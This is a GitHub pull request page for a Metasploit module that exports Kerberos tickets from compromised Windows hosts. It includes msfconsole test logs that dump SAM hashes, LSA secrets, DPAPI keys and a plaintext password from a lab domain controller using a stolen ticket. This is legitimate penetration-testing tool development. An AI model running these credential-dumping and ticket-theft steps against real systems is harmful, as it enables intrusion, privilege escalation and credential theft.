msf6 auxiliary(gather/windows_secrets_dump) > set smb::krb5ccname /home/msfuser/.msf4/loot/20231207124539_default_172.16.199.200_mit.kerberos.cca_080966.bin
smb::krb5ccname => /home/msfuser/.msf4/loot/20231207124539_default_172.16.199.200_mit.kerberos.cca_080966.bin
msf6 auxiliary(gather/windows_secrets_dump) > set SMBUser Administrator
SMBUser => Administrator
msf6 auxiliary(gather/windows_secrets_dump) > run
[*] Running module against 172.16.199.200
[*] 172.16.199.200:445 - Loaded a credential from ticket file: /home/msfuser/.msf4/loot/20231207124539_default_172.16.199.200_mit.kerberos.cca_080966.bin
[+] 172.16.199.200:445 - 172.16.199.200:88 - Received a valid TGS-Response
[*] 172.16.199.200:445 - 172.16.199.200:445 - TGS MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20231207125716_default_172.16.199.200_mit.kerberos.cca_706000.bin
[+] 172.16.199.200:445 - 172.16.199.200:88 - Received a valid delegation TGS-Response
[*] 172.16.199.200:445 - Service RemoteRegistry is in stopped state
[*] 172.16.199.200:445 - Starting service...
[*] 172.16.199.200:445 - Retrieving target system bootKey
[+] 172.16.199.200:445 - bootKey: 0xa1a5b68266be4bd9dc321c7df4f33d9d
[*] 172.16.199.200:445 - Saving remote SAM database
[*] 172.16.199.200:445 - Dumping SAM hashes
[*] 172.16.199.200:445 - Password hints:
No users with password hints on this system
[*] 172.16.199.200:445 - Password hashes (pwdump format - uid:rid:lmhash:nthash:::):
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4fd408d8f8ecb20d4b0768a0ac44b71f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] 172.16.199.200:445 - Saving remote SECURITY database
[*] 172.16.199.200:445 - Decrypting LSA Key
[*] 172.16.199.200:445 - Dumping LSA Secrets
$MACHINE.ACC
KERBEROS\DC2$:plain_password_hex:6824fa678afe37c2ce5c8e3cb17518c85f5e5bdfc60a21ea62551002a4d18daae4d7fbd1a09c0ad749e63560d09d98d06fb7008eab454a16b05d416dc0672bcc060752f05bfe84cff7d37509c5838fc2f43fe060013509121f88ce892bb3f372763b683db587f5722226bb18625f70f7cca92dadbd67b210512ba20bcc50e630cde50786f6e5ffc616d879ee056765f78b839d636cde34c3428dc5c10ff723a4c6b7f4e9c8b3021fac0dfc8a0c366ca8e478f88c14a0dd3693621aec781a3ee99505155d12547bd69080046749ce4fab4be5f252062663f43dd6b3c5a11df99307f047b5c753e91a8b61132c5e6fdbd9
KERBEROS\DC2$:aad3b435b51404eeaad3b435b51404ee:e567d50f4fb4b699a22c0342c66526ad:::
DefaultPassword
KERBEROS\msfuser: N0tpassword!
DPAPI_SYSTEM
dpapi_machinekey: 0x93780a4a58c9a699c6677c0458f7fc8f9991563c
dpapi_userkey: 0x25208fc3ddbe2e490212b21b35bb479b042d41ba
NL$KM
f1 47 26 b8 b1 86 a5 59 16 9a 38 4e e6 1e 65 40 |.G&....Y..8N..e@|
a6 06 9e 87 41 1f a5 54 5d 1f 0c 02 8a 9b d9 c2 |....A..T].......|
8e e0 20 ad 49 68 71 f5 e0 c0 93 7f fb 54 db 0f |.. .Ihq......T..|
e2 86 cf 13 c2 d6 9e 80 06 fe 1a f3 16 5b 86 ad |.............[..|
Hex string: f14726b8b186a559169a384ee61e6540a6069e87411fa5545d1f0c028a9bd9c28ee020ad496871f5e0c0937ffb54db0fe286cf13c2d69e8006fe1af3165b86ad
[*] 172.16.199.200:445 - Decrypting NL$KM
[*] 172.16.199.200:445 - Dumping cached hashes
No cached hashes on this system
[*] 172.16.199.200:445 - Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] 172.16.199.200:445 - Using the DRSUAPI method to get NTDS.DIT secrets
Actions ENUM_LUIDS & SHOW_LUID seem to be working just fine as well:
ENUM_LUIDS & SHOW_LUID
msf6 post(windows/manage/kerberos_tickets) > set action ENUM_LUIDS
action => ENUM_LUIDS
msf6 post(windows/manage/kerberos_tickets) > run
[*] LogonSession LUID: 0x00023eaff
[*] User: KERBEROS\Administrator
[*] Session: 1
[*] AuthenticationPackage: Kerberos
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-12-07 08:26:47 -0900
[*] LogonSession LUID: 0x00002564c
[*] User: NT Service\SQLTELEMETRY$VEEAMSQL2016
[*] Session: 0
[*] AuthenticationPackage: Negotiate
[*] LogonType: Service (5)
[*] LogonTime: 2023-12-07 08:15:36 -0900
[*] LogonSession LUID: 0x0000003e5
[*] User: NT AUTHORITY\LOCAL SERVICE
[*] Session: 0
[*] AuthenticationPackage: Negotiate
[*] LogonType: Service (5)
[*] LogonTime: 2023-12-07 08:15:29 -0900
[*] LogonSession LUID: 0x000012e7b
[*] User: Window Manager\DWM-1
[*] Session: 1
[*] AuthenticationPackage: Negotiate
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-12-07 08:15:29 -0900
[*] LogonSession LUID: 0x000012e22
[*] User: Window Manager\DWM-1
[*] Session: 1
[*] AuthenticationPackage: Negotiate
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-12-07 08:15:29 -0900
[*] LogonSession LUID: 0x0000003e4
[*] User: KERBEROS\MSF$
[*] Session: 0
[*] AuthenticationPackage: Negotiate
[*] LogonType: Service (5)
[*] LogonTime: 2023-12-07 08:15:28 -0900
[*] LogonSession LUID: 0x00000ce7b
[*] User: Font Driver Host\UMFD-0
[*] Session: 0
[*] AuthenticationPackage: Negotiate
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-12-07 08:15:28 -0900
[*] LogonSession LUID: 0x00000ce28
[*] User: Font Driver Host\UMFD-1
[*] Session: 1
[*] AuthenticationPackage: Negotiate
[*] LogonType: Interactive (2)
[*] LogonTime: 2023-12-07 08:15:28 -0900
[*] LogonSession LUID: 0x00000c35f
[*] User: \
[*] Session: 0
[*] AuthenticationPackage: NTLM
[*] LogonType: UndefinedLogonType (0)
[*] LogonTime: 2023-12-07 08:15:28 -0900
[*] LogonSession LUID: 0x0000003e7 (current)
[*] User: KERBEROS\MSF$
[*] Session: 0
[*] AuthenticationPackage: Negotiate
[*] LogonType: UndefinedLogonType (0)
[*] LogonTime: 2023-12-07 08:15:27 -0900
[*] Post module execution completed
msf6 post(windows/manage/kerberos_tickets) > set action SHOW_LUID
action => SHOW_LUID
msf6 post(windows/manage/kerberos_tickets) > run
[*] LogonSession LUID: 0x0000003e7 (current)
[*] User: KERBEROS\MSF$
[*] Session: 0
[*] AuthenticationPackage: Negotiate
[*] LogonType: UndefinedLogonType (0)
[*] LogonTime: 2023-12-07 08:15:27 -0900
[*] Post module execution completed
docs/metasploit-framework.wiki/kerberos/unconstrained_delegation.md
Outdated
Show resolved
Hide resolved
jheysel-r7
reviewed
Dec 7, 2023
docs/metasploit-framework.wiki/kerberos/unconstrained_delegation.md
Outdated
Show resolved
Hide resolved
Release NotesThis PR adds a module to manage Kerberos tickets from a compromised host. This notably allows Kerberos tickets to be exported from the target and then added to Metasploit's own cache, allowing them to be used for the duration in which they are valid. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This adds a module to manage Kerberos tickets from a compromised host. This notably allows Kerberos tickets to be exported from the target and then added to Metasploit's own cache, allowing them to be used for the duration in which they are valid. Client versions of Windows do not have a
klistbinary present, so users will need to rely on this module or bring a tool of their own such as Rubeus. This enables users to exploit Unconstrained Delegation misconfigurations within Metasploit to escalate their privileges.This module was implemented using Railgun which means that Meterpreter's that support railgun will work with it, and we don't need to write multiple Meterpreter extensions. Currently, the Python and Windows Meterpreter's both support railgun. As a disadvantage, this module can be a little slow due to all the Windows API calls that need to be made. For that reason, some information is omitted when
VERBOSEis disabled. Definitions for structures containing pointers have to be made twice, once for 32-bit and once for 64-bit versions of Windows. The module works without Administrative privileges, but in this case, it is only able to dump Kerberos tickets for the current user. When running with Administrative privileges, it is capable of dumping Kerberos tickets for all users. Nothing is written to disk, no new modules are loaded and no external commands are executed.This has been tested on Windows 8.1 x86 and Windows 10 x64.
Verification
msfconsoleklistcommand